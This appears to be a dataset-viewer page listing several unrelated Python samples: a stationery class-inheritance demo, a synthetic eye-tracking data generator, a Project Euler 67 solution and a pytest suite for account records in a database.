        print('Запуск отрисовки')
class Pen(Stationery):
    """Pen that reports its own title and concrete type when drawn."""

    def draw(self):
        print('Запуск отрисовки объекта {} типа {}'.format(self.title, type(self)))
class Pencil(Stationery):
    """Pencil that reports its own title and concrete type when drawn."""

    def draw(self):
        print('Запуск отрисовки объекта {} типа {}'.format(self.title, type(self)))
class Handle(Stationery):
    """Handle that reports its own title and concrete type when drawn."""

    def draw(self):
        print('Запуск отрисовки объекта {} типа {}'.format(self.title, type(self)))
def do():
    """Create one object of each stationery type and draw it."""
    for klass, name in ((Pen, 'pen'), (Pencil, 'pencil'), (Handle, 'handle')):
        klass(name).draw()
# Run the demo only when executed as a script.
if __name__ == '__main__':
    do()
|
import random
import math
import numpy as np
def data_pass_generator(n):
    """Simulate n 'passing' sessions of 100 gaze samples each.

    Each session is [center, blink, left, right] counts drawn with weights
    heavily favouring 'center' (92/4/2/2); the four counts always sum to 100.
    """
    sessions = []
    for _ in range(n):
        counts = [0, 0, 0, 0]  # center, blink, left, right
        for _ in range(100):
            [drawn] = random.choices(range(0, 4), weights=[92, 4, 2, 2])
            counts[drawn] += 1
        sessions.append(counts)
    return sessions
def data_non_pass_generator(n):
    """Simulate n 'non-passing' sessions of 100 gaze samples each.

    A per-session blink weight in [10, 30) makes the distribution noisier
    than the passing case; each [center, blink, left, right] row sums to 100.
    """
    sessions = []
    for _ in range(n):
        blink_weight = random.randrange(10, 30)
        counts = [0, 0, 0, 0]  # center, blink, left, right
        for _ in range(100):
            [drawn] = random.choices(range(0, 4), weights=[65, blink_weight, 5, 5])
            counts[drawn] += 1
        sessions.append(counts)
    return sessions
# Ratio <pass : non-pass> = <7 : 3>
# Ratio <pass : non-pass> = <7 : 3>
def get_eyetracking_data(n):
    """Return (data, label) arrays for n sessions at a fixed 7:3 split.

    Passing sessions come first (label 1), then non-passing (label 0).
    """
    pass_cnt = math.floor(n / 100 * 70)
    non_pass_cnt = n - pass_cnt
    data = np.array(
        data_pass_generator(pass_cnt) + data_non_pass_generator(non_pass_cnt))
    label = np.array([1] * pass_cnt + [0] * non_pass_cnt)
    return data, label
#Project Euler Problem 67
#Find the maximal sum through the triangle of 100 lines
# Read the triangle into a list of integer rows.
#f=open('smallTriangle.txt').readlines()
rows = []
for line in open('triangle.txt').readlines():
    rows.append([int(v) for v in line.split()])
# Collapse the triangle bottom-up: each cell absorbs the better of its two
# children, so the apex ends up holding the maximal path sum.
# BUG FIX: the original inner loop `range(0.i+1)` was a syntax error, and
# the partial sums it computed were never stored anywhere.
for i in range(len(rows) - 2, -1, -1):
    for j in range(len(rows[i])):
        rows[i][j] += max(rows[i + 1][j], rows[i + 1][j + 1])
print(rows[0][0])
|
import json
import os.path
import pytest
import sqlalchemy_utils
import sys
from scripts import udf
from scripts import config as tcn
import tests.test_functions as db
from scripts import env_vars as env_vars
#from scripts import config as cn
def readJson(fileLoc):
    """Load and return the parsed JSON document stored at `fileLoc`."""
    with open(fileLoc) as handle:
        return json.load(handle)
# Ensure the schema exists before any test runs (module-import side effect).
db.create_db_tables_if_not_exists()
# Fixture: the JSON document under test, loaded once for the whole module.
mDictFile = readJson(tcn.jPath)
# Checks that the fixture document has the expected number of top-level
# sections; the check is the same whether the source was JSON or CSV
# (pass when either/both files yielded the document, fail when neither did).
@pytest.mark.parametrize(
    "test_input,expected",
    [(str(len(mDictFile)), 2)]
    # i, ( str(mDictFile['data_platform']['action_type']), str('New')) ]
)
# check parameters
def test_param_head_count(test_input, expected):
    """The fixture must contain exactly `expected` top-level keys.

    NOTE(review): `eval` of the stringified length works because the
    parameter is a numeric literal, but it is fragile — a non-numeric
    string (e.g. 'New' from the commented-out case) would raise NameError.
    Consider comparing values directly instead of round-tripping via eval.
    """
    assert eval(test_input) == expected
def test_python_version():
    """The suite only supports Python 3."""
    assert sys.version_info[0] >= 3
# check database if exists
def test_database_if_exist():
    """The configured Postgres endpoint must already exist."""
    assert sqlalchemy_utils.functions.database_exists(env_vars.postgres_endpoint)
# check if action type is correct/valid
def test_action_type():
    """The fixture's action_type must be one of the allowed values."""
    action = mDictFile['data_platform']['action_type'].upper()
    assert action in tcn.valid_action_types
# Location of the local CSV fixtures relative to the working directory.
testDataPath = '/tests/data/'
currentPath = os.path.abspath(os.getcwd()) + testDataPath
# NOTE(review): this local csv_new appears unused — every reader below goes
# through tcn.csv_new instead. Confirm and remove if truly dead.
csv_new = '{}testData_new.csv'.format(currentPath)
# Read the json's
newAccount = readJson(tcn.jNewAccount)
updAccount = readJson(tcn.jUpdAccount)
delAccount = readJson(tcn.jDelAccount)
# Read the CSV's — csvToJson converts each file into the same dict shape
# as the JSON fixtures so both paths exercise the same helpers.
newAccountCsv = udf.csvToJson(tcn.csv_new)
updAccountCsv = udf.csvToJson(tcn.csv_update)
delAccountCsv = udf.csvToJson(tcn.csv_delete)
undelAccountCsv = udf.csvToJson(tcn.csv_undelete)
enableAccountCsv = udf.csvToJson(tcn.csv_enableaccount)
disableAccountCsv = udf.csvToJson(tcn.csv_disableaccount)
enableEtlCsv = udf.csvToJson(tcn.csv_enable_etl)
disableEtlCsv = udf.csvToJson(tcn.csv_disable_etl)
enableDualModeCsv = udf.csvToJson(tcn.csv_enable_dualmode)
disableDualModeCsv = udf.csvToJson(tcn.csv_disable_dualmode)
updateRetentionCsv = udf.csvToJson(tcn.csv_update_retention)
# Test Functions ..
# Account-lifecycle tests. Each helper in tests.test_functions returns a
# human-readable status string, which these asserts pin exactly — so a
# failure message names the step that broke.
# CSV-driven lifecycle: create, update, duplicate, toggle flags, delete.
def test_csv_add_record():
    assert (db.new_crecord(newAccountCsv) == 'Record Inserted')
def test_csv_update_record():
    assert (db.update_a_crecord(updAccountCsv) == "Record Updated")
def test_csv_duplicate_record():
    assert (db.duplicate_a_crecord(newAccountCsv) == "Record Duplicated")
def test_csv_enable_account():
    assert (db.enable_field(enableAccountCsv) == "Account Enabled")
def test_csv_disable_account():
    assert (db.disable_field(disableAccountCsv) == "Account Disabled")
def test_csv_enable_etl():
    assert (db.enable_field(enableEtlCsv) == "ETL Enabled")
def test_csv_disable_etl():
    assert (db.disable_field(disableEtlCsv) == "ETL Disabled")
def test_csv_enable_dual_send():
    assert (db.enable_field(enableDualModeCsv) == "Dual Send Enabled")
def test_csv_disable_dual_send():
    assert (db.disable_field(disableDualModeCsv) == 'Dual Send Disabled')
def test_csv_retention_period():
    assert (db.update_retention(updateRetentionCsv) == 'Retention Updated')
def test_csv_delete_record():
    assert (db.delete_a_crecord(delAccountCsv) == "Record Deleted")
# Same lifecycle driven from the JSON fixtures.
def test_json_add_record():
    assert (db.new_jrecord(newAccount) == "Record Inserted")
def test_json_update_record():
    assert (db.update_a_jrecord(updAccount) == "Record Updated")
def test_json_duplicate_record():
    assert (db.duplicate_a_jrecord(newAccount) == "Record Duplicated")
def test_json_delete_record():
    assert (db.delete_a_jrecord(delAccount) == "Record Deleted")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.